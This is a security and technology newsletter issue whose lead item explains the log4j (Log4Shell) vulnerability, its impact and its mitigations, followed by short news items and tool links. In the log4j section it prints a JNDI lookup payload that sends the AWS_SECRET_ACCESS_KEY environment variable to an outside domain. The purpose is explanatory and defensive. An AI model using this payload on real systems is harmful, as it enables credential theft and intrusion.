News & Analysis | No. 311

SECURITY NEWS

The log4j (Log4Shell) Situation 

What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs. 

Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. While Heartbleed affected all TLS implementations, and this one only affects systems that use log4j, this issue produces direct and immediate harm in the form of password/key extractions and shells.

This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

How it Works: The vulnerability is due to insecure “lookup” functionality within log4j that executes user-provided content as code, also known as RCE. So if you provide the input  `${env:PWD}`, it’ll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.

Example: Here’s an example from @dildog of extracting AWS Keys and listening for incoming requests. 

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

What to Do: The best way to fix this is to find all your instances of log4j and patch them to 2.15+. If you can’t do that, there are a few possible mitigations:
  • Patching: Upgrade to version 2.15.0.
  • Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
    Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.
  • Detection: I know many companies using Semgrep to find vulnerable inclusions of user-provided data. Here’s an example Semgrep rule I got from Clint Gibler of R2C/TLDRSec
  • Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it’s using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. | Code via Cybereason
  • Other Considerations: As David Litchfield pointed out in a number of tweets, this isn’t just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., are all additional attack vectors. Also consider second and N-level order processing of content on the backend as part of batch processes and other types of automation.
Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:
  1. The project is maintained by very few people in their spare time for no money, and
  2. If the project had a major issue it would disrupt the entire internet
We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.

This is not their fault. They’re heroes for keeping the lights on. It’s our fault because we know how bad the situation is and we just YOLO through life as if we didn’t. The result is that we get to learn about internet-stopping vulnerabilities from the Minecraft community.



The FBI says a ransomware gang out of Cuba has been launching ransomware attacks against US critical infrastructure. They’ve released IoCs to help others find attacks from the group. More

The FTC says Americans lost $148 million to gift card scams in 2021. More

Attackers are using the log4j vulnerability to install malware, including cryptominers and Mirai and Muhstik botnet clients. More

QNAP says there’s new cryptominer malware targeting vulnerable QNAP NAS devices. More

CIA Director William Burns said on Monday that the CIA “has a number of different projects focused on cryptocurrency”. He went on to say, “My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we’re seeing as well.” More

Incidents:
  • Volvo says attackers have stolen research and development information after hacking some of its servers. More
  • Marriot has suffered another data breach affecting 5.2 million guests. More
Vulnerabilities: 
  • log4j Critical RCE | Critical | RCE More
  • Sonicwall VPN Bugs in SMA 100-series Devices | Critical | RCE More
  • 4 WordPress Plugins | Critical | 1.6 Million Sites Affected | More
  • Mozilla Firefox and Thunderbird | High More
Companies:
  • Incode raises $220 million to do identity verification and authentication. More

TECHNOLOGY NEWS
DeepMind has revealed a new 280 billion parameter language model called Gopher. More

Italy has fined Amazon $1.3 billion for abusing its market position. More

Over 200 US newspapers have filed suit against Facebook and Google for monopolizing digital ad revenue—and by extension—online news. More

Meta has released Horizon Worlds, its social virtual reality space, to the world after more than a year in private testing mode. The platform functions much like Roblox in that you can create your own games within the base game. You currently can’t make money from your own games, but you can enter creator competitions and win money that way. More

Sports streaming is starting to intersect with sports betting, and Disney is deep into it. It’s the combination of watching sports with your friends and betting at the same time. More

People have spent $27 billion on NFTs in 2021 so far. Cryptopunks are the most popular collection with $3 billion in sales. More


HUMAN NEWS
Evergrande is a massive real estate company in China with over 200,000 employees, and it has defaulted on over $300 billion in outstanding liabilities. Beijing has intervened to prevent a collapse of the company. More

A new paper in Nature finds that exercise plasma boosts memory and dampens brain inflammation in mice. Interestingly, it shows that that plasma can be transferred to other mice, where they see the benefits as well. More

New research shows that Covid attacks fat tissue, which could be why obese people have been at higher risk of severe illness and death. More

Germany reported 70,000 new Covid infections last Wednesday, along with 534 deaths. These are the highest numbers in the country since February. More

60% of Republicans are confident in doctor’s advice, down from 73% in 2010. More


CONTENT, IDEAS & ANALYSIS
The Vigilant — We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications. Read the Blog


NOTES
I was sad to hear that Anne Rice has died. She was 80. More than vampires, she gave me a love for New Orleans. So much so that when I visited it, it seemed somewhat familiar. She’ll be missed. More

I’m really looking forward to taking some time off soon around the holidays. I have a good amount of content that’s around 60-80% done, and I want to get it all over the line by January 1st. 

Thanks to Caleb Sima for input into my log4j analysis above.


DISCOVERY  

Ben Evans put out the latest version of his annual presentation on technology trends, and it’s remarkably good as usual. Covers the rebranding of Web 1, 2, and 3, Crypto, VR/AR, NFTs, and so much more. More

Ryan Holiday’s 9 Rules for a better life. More

A Semgrep rule for detecting insecure log4j logging. More

“This week the internet has learned—once again—that asset management is the center of security. It’s hard to patch what you can’t find.” — Daniel Miessler

“The most consequential figures in the tech world are half guys like steve jobs and bill gates and half some guy named Ronald who maintains a Unix tool called ‘runk’ which stands for Ronald’s Universal Number Kounter and handles all math for every machine on earth.” — Druthers Haver

StopLyingCloud — An honest AWS service health dashboard. More

Amazon Brand Detector — A Chrome extension for detecting which products on Amazon are Amazon-owned. More

TimeandDate — A tool for seeing where planets are visible in the night sky where you live. More

Diagrams — Draw cloud system architecture diagrams using Python code. More

Log4Shell Recon and Post-Exploitation Network Detection — A collection of detection rules and IOCs by NCC. More | by NCC Research

Log4jAttackSurface — A Curated List of Companies and Technologies Affected by Log4Shell More | by YfryTcshsGD

Border Collie — Uses Semgrep and watchdog to detect reverse shells in your environment. More


RECOMMENDATIONS

Many people in tech have been working tirelessly since Thursday on Log4Shell. If you have any authority or influence to help them at work, make sure they get some public love within the organization, along with some extra time off. 


APHORISMS
“We don’t rise to the level of our goals. We fall to the level of our systems.”

James Clear
Uncategorized